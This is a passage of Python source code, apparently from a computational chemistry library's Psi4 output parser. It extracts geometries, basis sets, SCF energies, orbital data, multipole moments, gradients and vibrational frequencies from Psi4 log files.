# changes triggered by ==> things like this <==.
self.section = None
# There are also sometimes subsections within each section, denoted
# with =>/<= rather than ==>/<==.
self.subsection = None
def after_parsing(self):
super(Psi4, self).after_parsing()
# Newer versions of Psi4 don't explicitly print the number of atoms.
if not hasattr(self, 'natom'):
if hasattr(self, 'atomnos'):
self.set_attribute('natom', len(self.atomnos))
def normalisesym(self, label):
"""Use standard symmetry labels instead of Psi4 labels.
To normalise:
(1) `App` -> `A"`
(2) `Ap` -> `A'`
"""
return label.replace("pp", '"').replace("p", "'")
# Match the number of skipped lines required based on the type of
# gradient present (determined from the header), as otherwise the
# parsing is identical.
GradientInfo = namedtuple('GradientInfo', ['gradient_type', 'header', 'skip_lines'])
GRADIENT_TYPES = {
'analytic': GradientInfo('analytic',
'-Total Gradient:',
['header', 'dash header']),
'numerical': GradientInfo('numerical',
'## F-D gradient (Symmetry 0) ##',
['Irrep num and total size', 'b', '123', 'b']),
}
GRADIENT_HEADERS = set([gradient_type.header
for gradient_type in GRADIENT_TYPES.values()])
def extract(self, inputfile, line):
"""Extract information from the file object inputfile."""
# Extract the version number and the version control
# information, if it exists.
if "An Open-Source Ab Initio Electronic Structure Package" in line:
version_line = next(inputfile)
tokens = version_line.split()
package_version = tokens[1].split("-")[-1]
self.metadata["legacy_package_version"] = package_version
# Keep track of early versions of Psi4.
if "beta" in package_version:
self.version_4_beta = True
# `beta2+` -> `0!0.beta2`
package_version = "0!0.{}".format(package_version)
if package_version[-1] == "+":
# There is no good way to keep the bare plus sign around,
# but this version is so old...
package_version = package_version[:-1]
else:
package_version = "1!{}".format(package_version)
self.skip_line(inputfile, "blank")
line = next(inputfile)
if "Git:" in line:
tokens = line.split()
assert tokens[1] == "Rev"
revision = '-'.join(tokens[2:]).replace("{", "").replace("}", "")
dev_flag = "" if "dev" in package_version else ".dev"
package_version = "{}{}+{}".format(
package_version, dev_flag, revision
)
self.metadata["package_version"] = package_version
# This will automatically change the section attribute for Psi4, when encountering
# a line that <== looks like this ==>, to whatever is in between.
if (line.strip()[:3] == "==>") and (line.strip()[-3:] == "<=="):
self.section = line.strip()[4:-4]
if self.section == "DFT Potential":
self.metadata["methods"].append("DFT")
# There is also the possibility of subsections.
if (line.strip()[:2] == "=>") and (line.strip()[-2:] == "<="):
self.subsection = line.strip()[3:-3]
# Determine whether or not the reference wavefunction is
# restricted, unrestricted, or restricted open-shell.
if line.strip() == "SCF":
while "Reference" not in line:
line = next(inputfile)
self.reference = line.split()[0]
# Work with a complex reference as if it's real.
if self.reference[0] == 'C':
self.reference = self.reference[1:]
# Parse the XC density functional
# => Composite Functional: B3LYP <=
if self.section == "DFT Potential" and "composite functional" in line.lower():
chomp = line.split()
functional = chomp[-2]
self.metadata["functional"] = functional
# ==> Geometry <==
#
# Molecular point group: c2h
# Full point group: C2h
#
# Geometry (in Angstrom), charge = 0, multiplicity = 1:
#
# Center X Y Z
# ------------ ----------------- ----------------- -----------------
# C -1.415253322400 0.230221785400 0.000000000000
# C 1.415253322400 -0.230221785400 0.000000000000
# ...
#
if (self.section == "Geometry") and ("Molecular point group" in line):
point_group_abelian = line.split()[3].lower()
line = next(inputfile)
if "Full point group" in line:
point_group_full = line.split()[3].lower()
else:
# TODO this isn't right, need to "know" about symmetry.
point_group_full = point_group_abelian
self.metadata['symmetry_detected'] = point_group_full
self.metadata['symmetry_used'] = point_group_abelian
if (self.section == "Geometry") and ("Geometry (in Angstrom), charge" in line):
assert line.split()[3] == "charge"
charge = int(line.split()[5].strip(','))
self.set_attribute('charge', charge)
assert line.split()[6] == "multiplicity"
mult = int(line.split()[8].strip(':'))
self.set_attribute('mult', mult)
self.skip_line(inputfile, "blank")
line = next(inputfile)
# Usually there is the header and dashes, but, for example, the coordinates
# printed when a geometry optimization finishes do not have it.
if line.split()[0] == "Center":
self.skip_line(inputfile, "dashes")
line = next(inputfile)
elements = []
coords = []
atommasses = []
while line.strip():
chomp = line.split()
el, x, y, z = chomp[:4]
if len(el) > 1:
el = el[0] + el[1:].lower()
elements.append(el)
coords.append([float(x), float(y), float(z)])
# Newer versions of Psi4 print atomic masses.
if len(chomp) == 5:
atommasses.append(float(chomp[4]))
line = next(inputfile)
# The 0 is to handle the presence of ghost atoms.
self.set_attribute('atomnos', [self.table.number.get(el, 0) for el in elements])
if not hasattr(self, 'atomcoords'):
self.atomcoords = []
# This condition discards any repeated coordinates that Psi print. For example,
# geometry optimizations will print the coordinates at the beginning of and SCF
# section and also at the start of the gradient calculation.
if len(self.atomcoords) == 0 \
or (self.atomcoords[-1] != coords and not hasattr(self, 'finite_difference')):
self.atomcoords.append(coords)
if len(atommasses) > 0:
if not hasattr(self, 'atommasses'):
self.atommasses = atommasses
# Psi4 repeats the charge and multiplicity after the geometry.
if (self.section == "Geometry") and (line[2:16].lower() == "charge ="):
charge = int(line.split()[-1])
self.set_attribute('charge', charge)
if (self.section == "Geometry") and (line[2:16].lower() == "multiplicity ="):
mult = int(line.split()[-1])
self.set_attribute('mult', mult)
# The printout for Psi4 has a more obvious trigger for the SCF parameter printout.
if (self.section == "Algorithm") and (line.strip() == "==> Algorithm <==") \
and not hasattr(self, 'finite_difference'):
self.skip_line(inputfile, 'blank')
line = next(inputfile)
while line.strip():
if "Energy threshold" in line:
etarget = float(line.split()[-1])
if "Density threshold" in line:
dtarget = float(line.split()[-1])
line = next(inputfile)
if not hasattr(self, "scftargets"):
self.scftargets = []
self.scftargets.append([etarget, dtarget])
# This section prints contraction information before the atomic basis set functions and
# is a good place to parse atombasis indices as well as atomnos. However, the section this line
# is in differs between HF and DFT outputs.
#
# -Contraction Scheme:
# Atom Type All Primitives // Shells:
# ------ ------ --------------------------
# 1 C 6s 3p // 2s 1p
# 2 C 6s 3p // 2s 1p
# 3 C 6s 3p // 2s 1p
# ...
if self.section == "Primary Basis":
if line[2:12] == "Basis Set:":
self.metadata["basis_set"] = line.split()[2]
if (self.section == "Primary Basis" or self.section == "DFT Potential") and line.strip() == "-Contraction Scheme:":
self.skip_lines(inputfile, ['headers', 'd'])
atomnos = []
atombasis = []
atombasis_pos = 0
line = next(inputfile)
while line.strip():
element = line.split()[1]
if len(element) > 1:
element = element[0] + element[1:].lower()
atomnos.append(self.table.number[element])
# To count the number of atomic orbitals for the atom, sum up the orbitals
# in each type of shell, times the numbers of shells. Currently, we assume
# the multiplier is a single digit and that there are only s and p shells,
# which will need to be extended later when considering larger basis sets,
# with corrections for the cartesian/spherical cases.
ao_count = 0
shells = line.split('//')[1].split()
for s in shells:
count, type = s
multiplier = 3*(type == 'p') or 1
ao_count += multiplier*int(count)
if len(atombasis) > 0:
atombasis_pos = atombasis[-1][-1] + 1
atombasis.append(list(range(atombasis_pos, atombasis_pos+ao_count)))
line = next(inputfile)
self.set_attribute('natom', len(atomnos))
self.set_attribute('atomnos', atomnos)
self.set_attribute('atombasis', atombasis)
# The atomic basis set is straightforward to parse, but there are some complications
# when symmetry is used, because in that case Psi4 only print the symmetry-unique atoms,
# and the list of symmetry-equivalent ones is not printed. Therefore, for simplicity here
# when an atomic is missing (atom indices are printed) assume the atomic orbitals of the
# last atom of the same element before it. This might not work if a mixture of basis sets
# is used somehow... but it should cover almost all cases for now.
#
# Note that Psi also print normalized coefficients (details below).
#
# ==> AO Basis Functions <==
#
# [ STO-3G ]
# spherical
# ****
# C 1
# S 3 1.00
# 71.61683700 2.70781445
# 13.04509600 2.61888016
# ...
if (self.section == "AO Basis Functions") and (line.strip() == "==> AO Basis Functions <=="):
def get_symmetry_atom_basis(gbasis):
"""Get symmetry atom by replicating the last atom in gbasis of the same element."""
missing_index = len(gbasis)
missing_atomno = self.atomnos[missing_index]
ngbasis = len(gbasis)
last_same = ngbasis - self.atomnos[:ngbasis][::-1].index(missing_atomno) - 1
return gbasis[last_same]
dfact = lambda n: (n <= 0) or n * dfact(n-2)
# Early beta versions of Psi4 normalize basis function
# coefficients when printing.
if self.version_4_beta:
def get_normalization_factor(exp, lx, ly, lz):
norm_s = (2*exp/numpy.pi)**0.75
if lx + ly + lz > 0:
nom = (4*exp)**((lx+ly+lz)/2.0)
den = numpy.sqrt(dfact(2*lx-1) * dfact(2*ly-1) * dfact(2*lz-1))
return norm_s * nom / den
else:
return norm_s
else:
get_normalization_factor = lambda exp, lx, ly, lz: 1
self.skip_lines(inputfile, ['b', 'basisname'])
line = next(inputfile)
spherical = line.strip() == "spherical"
if hasattr(self, 'spherical_basis'):
assert self.spherical_basis == spherical
else:
self.spherical_basis = spherical
gbasis = []
self.skip_line(inputfile, 'stars')
line = next(inputfile)
while line.strip():
element, index = line.split()
if len(element) > 1:
element = element[0] + element[1:].lower()
index = int(index)
# This is the code that adds missing atoms when symmetry atoms are excluded
# from the basis set printout. Again, this will work only if all atoms of
# the same element use the same basis set.
while index > len(gbasis) + 1:
gbasis.append(get_symmetry_atom_basis(gbasis))
gbasis.append([])
line = next(inputfile)
while line.find("*") == -1:
# The shell type and primitive count is in the first line.
shell_type, nprimitives, _ = line.split()
nprimitives = int(nprimitives)
# Get the angular momentum for this shell type.
momentum = {'S': 0, 'P': 1, 'D': 2, 'F': 3, 'G': 4, 'H': 5, 'I': 6}[shell_type.upper()]
# Read in the primitives.
primitives_lines = [next(inputfile) for i in range(nprimitives)]
primitives = [list(map(float, pl.split())) for pl in primitives_lines]
# Un-normalize the coefficients. Psi prints the normalized coefficient
# of the highest polynomial, namely XX for D orbitals, XXX for F, and so on.
for iprim, prim in enumerate(primitives):
exp, coef = prim
coef = coef / get_normalization_factor(exp, momentum, 0, 0)
primitives[iprim] = [exp, coef]
primitives = [tuple(p) for p in primitives]
shell = [shell_type, primitives]
gbasis[-1].append(shell)
line = next(inputfile)
line = next(inputfile)
# We will also need to add symmetry atoms that are missing from the input
# at the end of this block, if the symmetry atoms are last.
while len(gbasis) < self.natom:
gbasis.append(get_symmetry_atom_basis(gbasis))
self.gbasis = gbasis
# A block called 'Calculation Information' prints these before starting the SCF.
if (self.section == "Pre-Iterations") and ("Number of atoms" in line):
natom = int(line.split()[-1])
self.set_attribute('natom', natom)
if (self.section == "Pre-Iterations") and ("Number of atomic orbitals" in line):
nbasis = int(line.split()[-1])
self.set_attribute('nbasis', nbasis)
if (self.section == "Pre-Iterations") and ("Total" in line):
chomp = line.split()
nbasis = int(chomp[1])
self.set_attribute('nbasis', nbasis)
# ==> Iterations <==
# Psi4 converges both the SCF energy and density elements and reports both in the
# iterations printout. However, the default convergence scheme involves a density-fitted
# algorithm for efficiency, and this is often followed by a something with exact electron
# repulsion integrals. In that case, there are actually two convergence cycles performed,
# one for the density-fitted algorithm and one for the exact one, and the iterations are
# printed in two blocks separated by some set-up information.
if (self.section == "Iterations") and (line.strip() == "==> Iterations <==") \
and not hasattr(self, 'finite_difference'):
if not hasattr(self, 'scfvalues'):
self.scfvalues = []
scfvals = []
self.skip_lines(inputfile, ['b', 'header', 'b'])
line = next(inputfile)
# Read each SCF iteration.
while line.strip() != "==> Post-Iterations <==":
if line.strip() and line.split()[0][0] == '@':
denergy = float(line.split()[4])
ddensity = float(line.split()[5])
scfvals.append([denergy, ddensity])
try:
line = next(inputfile)
except StopIteration:
self.logger.warning('File terminated before end of last SCF! Last density err: {}'.format(ddensity))
break
self.section = "Post-Iterations"
self.scfvalues.append(scfvals)
# This section, from which we parse molecular orbital symmetries and
# orbital energies, is quite similar for both Psi3 and Psi4, and in fact
# the format for orbtials is the same, although the headers and spacers
# are a bit different. Let's try to get both parsed with one code block.
#
# Here is how the block looks like for Psi4:
#
# Orbital Energies (a.u.)
# -----------------------
#
# Doubly Occupied:
#
# 1Bu -11.040586 1Ag -11.040524 2Bu -11.031589
# 2Ag -11.031589 3Bu -11.028950 3Ag -11.028820
# (...)
# 15Ag -0.415620 1Bg -0.376962 2Au -0.315126
# 2Bg -0.278361 3Bg -0.222189
#
# Virtual:
#
# 3Au 0.198995 4Au 0.268517 4Bg 0.308826
# 5Au 0.397078 5Bg 0.521759 16Ag 0.565017
# (...)
# 24Ag 0.990287 24Bu 1.027266 25Ag 1.107702
# 25Bu 1.124938
#
# The case is different in the trigger string.
if ("orbital energies (a.u.)" in line.lower() or "orbital energies [eh]" in line.lower()) \
and not hasattr(self, 'finite_difference'):
# If this is Psi4, we will be in the appropriate section.
assert self.section == "Post-Iterations"
self.moenergies = [[]]
self.mosyms = [[]]
# Psi4 has dashes under the trigger line, but Psi3 did not.
self.skip_line(inputfile, 'dashes')
self.skip_line(inputfile, 'blank')
# Both versions have this case-insensitive substring.
occupied = next(inputfile)
if self.reference[0:2] == 'RO' or self.reference[0:1] == 'R':
assert 'doubly occupied' in occupied.lower()
elif self.reference[0:1] == 'U':
assert 'alpha occupied' in occupied.lower()
self.skip_line(inputfile, 'blank')
# Parse the occupied MO symmetries and energies.
self._parse_mosyms_moenergies(inputfile, 0)
# The last orbital energy here represents the HOMO.
self.homos = [len(self.moenergies[0])-1]
# For a restricted open-shell calculation, this is the
# beta HOMO, and we assume the singly-occupied orbitals
# are all alpha, which are handled next.
if self.reference[0:2] == 'RO':
self.homos.append(self.homos[0])
unoccupied = next(inputfile)
if self.reference[0:2] == 'RO':
assert unoccupied.strip() == 'Singly Occupied:'
elif self.reference[0:1] == 'R':
assert unoccupied.strip() == 'Virtual:'
elif self.reference[0:1] == 'U':
assert unoccupied.strip() == 'Alpha Virtual:'
# Psi4 now has a blank line, Psi3 does not.
self.skip_line(inputfile, 'blank')
# Parse the unoccupied MO symmetries and energies.
self._parse_mosyms_moenergies(inputfile, 0)
# Here is where we handle the Beta or Singly occupied orbitals.
if self.reference[0:1] == 'U':
self.mosyms.append([])
self.moenergies.append([])
line = next(inputfile)
assert line.strip() == 'Beta Occupied:'
self.skip_line(inputfile, 'blank')
self._parse_mosyms_moenergies(inputfile, 1)
self.homos.append(len(self.moenergies[1])-1)
line = next(inputfile)
assert line.strip() == 'Beta Virtual:'
self.skip_line(inputfile, 'blank')
self._parse_mosyms_moenergies(inputfile, 1)
elif self.reference[0:2] == 'RO':
line = next(inputfile)
assert line.strip() == 'Virtual:'
self.skip_line(inputfile, 'blank')
self._parse_mosyms_moenergies(inputfile, 0)
line = next(inputfile)
assert line.strip() == 'Final Occupation by Irrep:'
line = next(inputfile)
irreps = line.split()
line = next(inputfile)
tokens = line.split()
assert tokens[0] == 'DOCC'
docc = sum([int(x.replace(',', '')) for x in tokens[2:-1]])
line = next(inputfile)
if line.strip():
tokens = line.split()
assert tokens[0] in ('SOCC', 'NA')
socc = sum([int(x.replace(',', '')) for x in tokens[2:-1]])
# Fix up the restricted open-shell alpha HOMO.
if self.reference[0:2] == 'RO':
self.homos[0] += socc
# Both Psi3 and Psi4 print the final SCF energy right after the orbital energies,
# but the label is different. Psi4 also does DFT, and the label is also different in that case.
if self.section == "Post-Iterations" and "Final Energy:" in line \
and not hasattr(self, 'finite_difference'):
e = float(line.split()[3])
if not hasattr(self, 'scfenergies'):
self.scfenergies = []
self.scfenergies.append(utils.convertor(e, 'hartree', 'eV'))
if self.subsection == "Energetics":
if "Empirical Dispersion Energy" in line:
dispersion = utils.convertor(float(line.split()[-1]), "hartree", "eV")
self.append_attribute("dispersionenergies", dispersion)
# ==> Molecular Orbitals <==
#
# 1 2 3 4 5
#
# 1 H1 s0 0.1610392 0.1040990 0.0453848 0.0978665 1.0863246
# 2 H1 s0 0.3066996 0.0742959 0.8227318 1.3460922 -1.6429494
# 3 H1 s0 0.1669296 1.5494169 -0.8885631 -1.8689490 1.0473633
# 4 H2 s0 0.1610392 -0.1040990 0.0453848 -0.0978665 -1.0863246
# 5 H2 s0 0.3066996 -0.0742959 0.8227318 -1.3460922 1.6429494
# 6 H2 s0 0.1669296 -1.5494169 -0.8885631 1.8689490 -1.0473633
#
# Ene -0.5279195 0.1235556 0.3277474 0.5523654 2.5371710
# Sym Ag B3u Ag B3u B3u
# Occ 2 0 0 0 0
#
#
# 6
#
# 1 H1 s0 1.1331221
# 2 H1 s0 -1.2163107
# 3 H1 s0 0.4695317
# 4 H2 s0 1.1331221
# 5 H2 s0 -1.2163107
# 6 H2 s0 0.4695317
#
# Ene 2.6515637
# Sym Ag
# Occ 0
if (self.section) and ("Molecular Orbitals" in self.section) \
and ("Molecular Orbitals" in line) and not hasattr(self, 'finite_difference'):
self.skip_line(inputfile, 'blank')
mocoeffs = []
indices = next(inputfile)
while indices.strip():
if indices[:3] == '***':
break
indices = [int(i) for i in indices.split()]
if len(mocoeffs) < indices[-1]:
for i in range(len(indices)):
mocoeffs.append([])
else:
assert len(mocoeffs) == indices[-1]
self.skip_line(inputfile, 'blank')
n = len(indices)
line = next(inputfile)
while line.strip():
chomp = line.split()
m = len(chomp)
iao = int(chomp[0])
coeffs = [float(c) for c in chomp[m - n:]]
for i, c in enumerate(coeffs):
mocoeffs[indices[i]-1].append(c)
line = next(inputfile)
energies = next(inputfile)
symmetries = next(inputfile)
occupancies = next(inputfile)
self.skip_lines(inputfile, ['b', 'b'])
indices = next(inputfile)
if not hasattr(self, 'mocoeffs'):
self.mocoeffs = []
self.mocoeffs.append(mocoeffs)
# The formats for Mulliken and Lowdin atomic charges are the same, just with
# the name changes, so use the same code for both.
#
# Properties computed using the SCF density density matrix
# Mulliken Charges: (a.u.)
# Center Symbol Alpha Beta Spin Total
# 1 C 2.99909 2.99909 0.00000 0.00182
# 2 C 2.99909 2.99909 0.00000 0.00182
# ...
for pop_type in ["Mulliken", "Lowdin"]:
if line.strip() == "%s Charges: (a.u.)" % pop_type:
if not hasattr(self, 'atomcharges'):
self.atomcharges = {}
header = next(inputfile)
line = next(inputfile)
while not line.strip():
line = next(inputfile)
charges = []
while line.strip():
ch = float(line.split()[-1])
charges.append(ch)
line = next(inputfile)
self.atomcharges[pop_type.lower()] = charges
# This is for the older conventional MP2 code in 4.0b5.
mp_trigger = "MP2 Total Energy (a.u.)"
if line.strip()[:len(mp_trigger)] == mp_trigger:
self.metadata["methods"].append("MP2")
mpenergy = utils.convertor(float(line.split()[-1]), 'hartree', 'eV')
if not hasattr(self, 'mpenergies'):
self.mpenergies = []
self.mpenergies.append([mpenergy])
# This is for the newer DF-MP2 code in 4.0.
if 'DF-MP2 Energies' in line:
self.metadata["methods"].append("DF-MP2")
while 'Total Energy' not in line:
line = next(inputfile)
mpenergy = utils.convertor(float(line.split()[3]), 'hartree', 'eV')
if not hasattr(self, 'mpenergies'):
self.mpenergies = []
self.mpenergies.append([mpenergy])
# Note this is just a start and needs to be modified for CCSD(T), etc.
ccsd_trigger = "* CCSD total energy"
if line.strip()[:len(ccsd_trigger)] == ccsd_trigger:
self.metadata["methods"].append("CCSD")
ccsd_energy = utils.convertor(float(line.split()[-1]), 'hartree', 'eV')
if not hasattr(self, "ccenergis"):
self.ccenergies = []
self.ccenergies.append(ccsd_energy)
# The geometry convergence targets and values are printed in a table, with the legends
# describing the convergence annotation. Probably exact slicing of the line needs
# to be done in order to extract the numbers correctly. If there are no values for
# a paritcular target it means they are not used (marked also with an 'o'), and in this case
# we will set a value of numpy.inf so that any value will be smaller.
#
# ==> Convergence Check <==
#
# Measures of convergence in internal coordinates in au.
# Criteria marked as inactive (o), active & met (*), and active & unmet ( ).
# ---------------------------------------------------------------------------------------------
# Step Total Energy Delta E MAX Force RMS Force MAX Disp RMS Disp
# ---------------------------------------------------------------------------------------------
# Convergence Criteria 1.00e-06 * 3.00e-04 * o 1.20e-03 * o
# ---------------------------------------------------------------------------------------------
# 2 -379.77675264 -7.79e-03 1.88e-02 4.37e-03 o 2.29e-02 6.76e-03 o ~
# ---------------------------------------------------------------------------------------------
#
if (self.section == "Convergence Check") and line.strip() == "==> Convergence Check <==" \
and not hasattr(self, 'finite_difference'):
if not hasattr(self, "optstatus"):
self.optstatus = []
self.optstatus.append(data.ccData.OPT_UNKNOWN)
self.skip_lines(inputfile, ['b', 'units', 'comment', 'dash+tilde', 'header', 'dash+tilde'])
# These are the position in the line at which numbers should start.
starts = [27, 41, 55, 69, 83]
criteria = next(inputfile)
geotargets = []
for istart in starts:
if criteria[istart:istart+9].strip():
geotargets.append(float(criteria[istart:istart+9]))
else:
geotargets.append(numpy.inf)
self.skip_line(inputfile, 'dashes')
values = next(inputfile)
step = int(values.split()[0])
geovalues = []
for istart in starts:
if values[istart:istart+9].strip():
geovalues.append(float(values[istart:istart+9]))
if step == 1:
self.optstatus[-1] += data.ccData.OPT_NEW
# This assertion may be too restrictive, but we haven't seen the geotargets change.
# If such an example comes up, update the value since we're interested in the last ones.
if not hasattr(self, 'geotargets'):
self.geotargets = geotargets
else:
assert self.geotargets == geotargets
if not hasattr(self, 'geovalues'):
self.geovalues = []
self.geovalues.append(geovalues)
# This message signals a converged optimization, in which case we want
# to append the index for this step to optdone, which should be equal
# to the number of geovalues gathered so far.
if "Optimization is complete!" in line:
# This is a workaround for Psi4.0/sample_opt-irc-2.out;
# IRC calculations currently aren't parsed properly for
# optimization parameters.
if hasattr(self, 'geovalues'):
if not hasattr(self, 'optdone'):
self.optdone = []
self.optdone.append(len(self.geovalues))
assert hasattr(self, "optstatus") and len(self.optstatus) > 0
self.optstatus[-1] += data.ccData.OPT_DONE
# This message means that optimization has stopped for some reason, but we
# still want optdone to exist in this case, although it will be an empty list.
if line.strip() == "Optimizer: Did not converge!":
if not hasattr(self, 'optdone'):
self.optdone = []
assert hasattr(self, "optstatus") and len(self.optstatus) > 0
self.optstatus[-1] += data.ccData.OPT_UNCONVERGED
# The reference point at which properties are evaluated in Psi4 is explicitely stated,
# so we can save it for later. It is not, however, a part of the Properties section,
# but it appears before it and also in other places where properies that might depend
# on it are printed.
#
# Properties will be evaluated at 0.000000, 0.000000, 0.000000 Bohr
#
# OR
#
# Properties will be evaluated at 0.000000, 0.000000, 0.000000 [a0]
#
if "Properties will be evaluated at" in line.strip():
self.origin = numpy.array([float(x.strip(',')) for x in line.split()[-4:-1]])
assert line.split()[-1] in ["Bohr", "[a0]"]
self.origin = utils.convertor(self.origin, 'bohr', 'Angstrom')
# The properties section print the molecular dipole moment:
#
# ==> Properties <==
#
#
#Properties computed using the SCF density density matrix
# Nuclear Dipole Moment: (a.u.)
# X: 0.0000 Y: 0.0000 Z: 0.0000
#
# Electronic Dipole Moment: (a.u.)
# X: 0.0000 Y: 0.0000 Z: 0.0000
#
# Dipole Moment: (a.u.)
# X: 0.0000 Y: 0.0000 Z: 0.0000 Total: 0.0000
#
if (self.section == "Properties") and line.strip() == "Dipole Moment: (a.u.)":
line = next(inputfile)
dipole = numpy.array([float(line.split()[1]), float(line.split()[3]), float(line.split()[5])])
dipole = utils.convertor(dipole, "ebohr", "Debye")
if not hasattr(self, 'moments'):
# Old versions of Psi4 don't print the origin; assume
# it's at zero.
if not hasattr(self, 'origin'):
self.origin = numpy.array([0.0, 0.0, 0.0])
self.moments = [self.origin, dipole]
else:
try:
assert numpy.all(self.moments[1] == dipole)
except AssertionError:
self.logger.warning('Overwriting previous multipole moments with new values')
self.logger.warning('This could be from post-HF properties or geometry optimization')
self.moments = [self.origin, dipole]
# Higher multipole moments are printed separately, on demand, in lexicographical order.
#
# Multipole Moments:
#
# ------------------------------------------------------------------------------------
# Multipole Electric (a.u.) Nuclear (a.u.) Total (a.u.)
# ------------------------------------------------------------------------------------
#
# L = 1. Multiply by 2.5417462300 to convert to Debye
# Dipole X : 0.0000000 0.0000000 0.0000000
# Dipole Y : 0.0000000 0.0000000 0.0000000
# Dipole Z : 0.0000000 0.0000000 0.0000000
#
# L = 2. Multiply by 1.3450341749 to convert to Debye.ang
# Quadrupole XX : -1535.8888701 1496.8839996 -39.0048704
# Quadrupole XY : -11.5262958 11.4580038 -0.0682920
# ...
#
if line.strip() == "Multipole Moments:":
self.skip_lines(inputfile, ['b', 'd', 'header', 'd', 'b'])
# The reference used here should have been printed somewhere
# before the properties and parsed above.
moments = [self.origin]
line = next(inputfile)
while "----------" not in line.strip():
rank = int(line.split()[2].strip('.'))
multipole = []
line = next(inputfile)
while line.strip():
value = float(line.split()[-1])
fromunits = "ebohr" + (rank > 1)*("%i" % rank)
tounits = "Debye" + (rank > 1)*".ang" + (rank > 2)*("%i" % (rank-1))
value = utils.convertor(value, fromunits, tounits)
multipole.append(value)
line = next(inputfile)
multipole = numpy.array(multipole)
moments.append(multipole)
line = next(inputfile)
if not hasattr(self, 'moments'):
self.moments = moments
else:
for im, m in enumerate(moments):
if len(self.moments) <= im:
self.moments.append(m)
else:
assert numpy.allclose(self.moments[im], m, atol=1.0e4)
## Analytic Gradient
# -Total Gradient:
# Atom X Y Z
# ------ ----------------- ----------------- -----------------
# 1 -0.000000000000 0.000000000000 -0.064527252292
# 2 0.000000000000 -0.028380539652 0.032263626146
# 3 -0.000000000000 0.028380539652 0.032263626146
## Finite Differences Gradient
# -------------------------------------------------------------
# ## F-D gradient (Symmetry 0) ##
# Irrep: 1 Size: 3 x 3
#
# 1 2 3
#
# 1 0.00000000000000 0.00000000000000 -0.02921303282515
# 2 0.00000000000000 -0.00979709321487 0.01460651641258
# 3 0.00000000000000 0.00979709321487 0.01460651641258
if line.strip() in Psi4.GRADIENT_HEADERS:
# Handle the different header lines between analytic and
# numerical gradients.
gradient_skip_lines = [
info.skip_lines
for info in Psi4.GRADIENT_TYPES.values()
if info.header == line.strip()
][0]
gradient = self.parse_gradient(inputfile, gradient_skip_lines)
if not hasattr(self, 'grads'):
self.grads = []
self.grads.append(gradient)
# OLD Normal mode output parser (PSI4 < 1)
## Harmonic frequencies.
# -------------------------------------------------------------
# Computing second-derivative from gradients using projected,
# symmetry-adapted, cartesian coordinates (fd_freq_1).
# 74 gradients passed in, including the reference geometry.
# Generating complete list of displacements from unique ones.
# Operation 2 takes plus displacements of irrep Bg to minus ones.
# Operation 3 takes plus displacements of irrep Au to minus ones.
# Operation 2 takes plus displacements of irrep Bu to minus ones.
# Irrep Harmonic Frequency
# (cm-1)
# -----------------------------------------------
# Au 137.2883
if line.strip() == 'Irrep Harmonic Frequency':
vibsyms = []
vibfreqs = []
self.skip_lines(inputfile, ['(cm-1)', 'dashes'])
## The first section contains the symmetry of each normal
## mode and its frequency.
line = next(inputfile)
while '---' not in line:
chomp = line.split()
vibsym = chomp[0]
vibfreq = Psi4.parse_vibfreq(chomp[1])
vibsyms.append(vibsym)
vibfreqs.append(vibfreq)
line = next(inputfile)
self.set_attribute('vibsyms', vibsyms)
self.set_attribute('vibfreqs', vibfreqs)
line = next(inputfile)
assert line.strip() == ''
line = next(inputfile)
assert 'Normal Modes' in line
line = next(inputfile)
assert 'Molecular mass is' in line
if hasattr(self, 'atommasses'):
assert abs(float(line.split()[3]) - sum(self.atommasses)) < 1.0e-4
line = next(inputfile)
assert line.strip() == 'Frequencies in cm^-1; force constants in au.'
line = next(inputfile)
assert line.strip() == ''
line = next(inputfile)
## The second section contains the frequency, force
## constant, and displacement for each normal mode, along
## with the atomic masses.
# Normal Modes (non-mass-weighted).
# Molecular mass is 130.07825 amu.
# Frequencies in cm^-1; force constants in au.
# Frequency: 137.29
# Force constant: 0.0007
# X Y Z mass
# C 0.000 0.000 0.050 12.000000
# C 0.000 0.000 0.050 12.000000
for vibfreq in self.vibfreqs:
_vibfreq = Psi4.parse_vibfreq(line[13:].strip())
assert abs(vibfreq - _vibfreq) < 1.0e-2
line = next(inputfile)
assert 'Force constant:' in line
if not hasattr(self, "vibfconsts"):
self.vibfconsts = []
self.vibfconsts.append(
utils.convertor(float(line.split()[2]), "hartree/bohr2", "mDyne/angstrom")
)
line = next(inputfile)
assert 'X Y Z mass' in line
line = next(inputfile)
if not hasattr(self, 'vibdisps'):
self.vibdisps = []
normal_mode_disps = []
# for k in range(self.natom):
while line.strip():
chomp = line.split()
# Do nothing with this for now.
atomsym = chomp[0]
atomcoords = [float(x) for x in chomp[1:4]]
# Do nothing with this for now.
atommass = float(chomp[4])
normal_mode_disps.append(atomcoords)
line = next(inputfile)
self.vibdisps.append(normal_mode_disps)
line = next(inputfile)
# NEW Normal mode output parser (PSI4 >= 1)
# ==> Harmonic Vibrational Analysis <==
# ...
# Vibration 7 8 9
# ...
#
# Vibration 10 11 12
# ...
if line.strip() == '==> Harmonic Vibrational Analysis <==':
vibsyms = []
vibfreqs = []
vibdisps = []
vibrmasses = []
vibfconsts = []
# Skip lines till the first Vibration block
while not line.strip().startswith('Vibration'):
line = next(inputfile)
n_modes = 0
# Parse all the Vibration blocks
while line.strip().startswith('Vibration'):
n = len(line.split()) - 1
n_modes += n
vibfreqs_, vibsyms_, vibdisps_, vibrmasses_, vibfconsts_ = self.parse_vibration(n, inputfile)
vibfreqs.extend(vibfreqs_)
vibsyms.extend(vibsyms_)
vibdisps.extend(vibdisps_)
vibrmasses.extend(vibrmasses_)
vibfconsts.extend(vibfconsts_)
line = next(inputfile)
# It looks like the symmetry of the normal mode may be missing
# from some / most. Only include them if they are there for all
if len(vibfreqs) == n_modes:
self.set_attribute('vibfreqs', vibfreqs)
if len(vibsyms) == n_modes:
self.set_attribute('vibsyms', vibsyms)
if len(vibdisps) == n_modes:
self.set_attribute('vibdisps', vibdisps)
if len(vibdisps) == n_modes:
self.set_attribute('vibrmasses', vibrmasses)
if len(vibdisps) == n_modes:
self.set_attribute('vibfconsts', vibfconsts)
# Second one is 1.0, first one is 1.2 and newer
if (self.section == "Thermochemistry Energy Analysis" and "Thermochemistry Energy Analysis" in line) \
or (self.section == "Energy Analysis" and "Energy Analysis" in line):
self.skip_lines(
inputfile,
[
"b",
"Raw electronic energy",
"Total E0",
"b",
"Zero-point energy, ZPE_vib = Sum_i nu_i / 2",
"Electronic ZPE",
"Translational ZPE",
"Rotational ZPE"
]
)
line = next(inputfile)
assert "Vibrational ZPE" in line
self.set_attribute("zpve", float(line.split()[6]))
# If finite difference is used to compute forces (i.e. by displacing
